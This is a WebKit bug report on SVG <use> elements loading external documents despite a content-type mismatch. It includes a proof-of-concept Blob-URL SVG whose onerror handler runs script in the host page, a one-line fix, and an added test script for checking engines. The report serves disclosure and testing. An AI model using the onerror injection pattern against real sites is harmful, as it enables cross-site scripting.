Bug 249948 - SVGUseElement sniffs content type when loading external document
Summary: SVGUseElement sniffs content type when loading external document
Status: NEW
Alias: None
Product: WebKit
Classification: Unclassified
Component: SVG
Version: WebKit Nightly Build
Hardware: Unspecified Unspecified
Importance: P2 Normal
Assignee: Nobody
URL:
Keywords: BrowserCompat, InRadar
Depends on:
Blocks:
 
Reported: 2022-12-29 14:38 PST by Jun Kokatsu
Modified: 2023-01-04 16:35 PST (History)

See Also:


Description Jun Kokatsu 2022-12-29 14:38:35 PST
PoC:

```
// External SVG document: its <image> points at a non-existent href, so the
// inline onerror handler fires in the host page once the document is cloned into the <use>.
const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`;
// Served from a Blob URL with a deliberately wrong type, i.e. not "image/svg+xml".
const blob = new Blob([text], {type: 'application/octet-stream'});
const url = URL.createObjectURL(blob);
// Fragment selects the element to clone from the external document.
let attackerControlledString = url + "#x";
const svg = document.createElementNS("http://www.w3.org/2000/svg", "svg");
const use = document.createElementNS("http://www.w3.org/2000/svg", "use");
use.setAttribute('href', attackerControlledString);
svg.appendChild(use);
document.body.appendChild(svg);
```

The above code only loads the external SVG from a Blob URL in WebKit. Both Blink and Gecko ignore it due to the content type mismatch.

A potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614.

```
options.sniffContent = ContentSniffingPolicy::DoNotSniffContent;
```
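As an added example (not part of the bug report or of WebKit), the PoC above turned into a browser check with a control: the same external document is served from two Blob URLs, one with the matching type `image/svg+xml` and one with `application/octet-stream`, and each copy reports back through a callback instead of `alert()`. It assumes, as the reporter's PoC shows, that the inline handler of the cloned `<image>` runs in the host page's global scope; the callback name `__svgUseProbe`, the 2 second wait and the `contentTypeAllowsSvgUse` gate (the declared-type check a non-sniffing loader would apply) are illustrative choices, not WebKit code.

```javascript
// Added example: probe whether an engine clones a <use> target out of an
// external document whose declared content type is not image/svg+xml.
const SVG_NS = 'http://www.w3.org/2000/svg';

// The gate a non-sniffing loader applies: only the declared media type
// matters; parameters such as charset are ignored and matching is
// case-insensitive. Body bytes are never consulted.
function contentTypeAllowsSvgUse(contentType) {
  if (typeof contentType !== 'string') return false;
  const mediaType = contentType.split(';')[0].trim().toLowerCase();
  return mediaType === 'image/svg+xml';
}

// External document whose <image> fails to load and reports which probe
// it belongs to. Hypothetical callback name: window.__svgUseProbe.
function buildProbeDocument(id, tag) {
  return `<svg id="${id}" xmlns="${SVG_NS}">` +
    `<image href="xyz" width="1" height="1" onerror="window.__svgUseProbe('${tag}')"/>` +
    `</svg>`;
}

// Browser-only: mount one <use> per content type and collect the callbacks.
// Resolves with {"image/svg+xml": bool, "application/octet-stream": bool,
// sniffsContentType: bool}; sniffsContentType is true when the mismatched
// document was loaded, which is the behaviour this bug describes.
function runProbe(timeoutMs = 2000) {
  if (typeof document === 'undefined') {
    return Promise.reject(new Error('runProbe needs a browser DOM'));
  }
  const results = { 'image/svg+xml': false, 'application/octet-stream': false };
  window.__svgUseProbe = (tag) => { results[tag] = true; };
  for (const type of Object.keys(results)) {
    const blob = new Blob([buildProbeDocument('x', type)], { type });
    const url = URL.createObjectURL(blob) + '#x';
    const svg = document.createElementNS(SVG_NS, 'svg');
    const use = document.createElementNS(SVG_NS, 'use');
    use.setAttribute('href', url);
    svg.appendChild(use);
    document.body.appendChild(svg);
  }
  return new Promise((resolve) => setTimeout(() => resolve({
    ...results,
    sniffsContentType: results['application/octet-stream'],
  }), timeoutMs));
}

// Stand-alone use in a browser console; the helpers above also run under Node.
if (typeof document !== 'undefined') {
  runProbe().then((r) => console.log(JSON.stringify(r)));
}
```

An engine that honours the declared type should report `"image/svg+xml": true` and `"application/octet-stream": false`; a result with both true is the behaviour this bug reports. The `contentTypeAllowsSvgUse` helper spells out what "do not sniff" buys: the decision is made on the declared type alone, so an `application/octet-stream` Blob whose bytes happen to be SVG is rejected.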
Comment 1 Radar WebKit Bug Importer 2023-01-04 16:35:34 PST
<rdar://problem/103893082>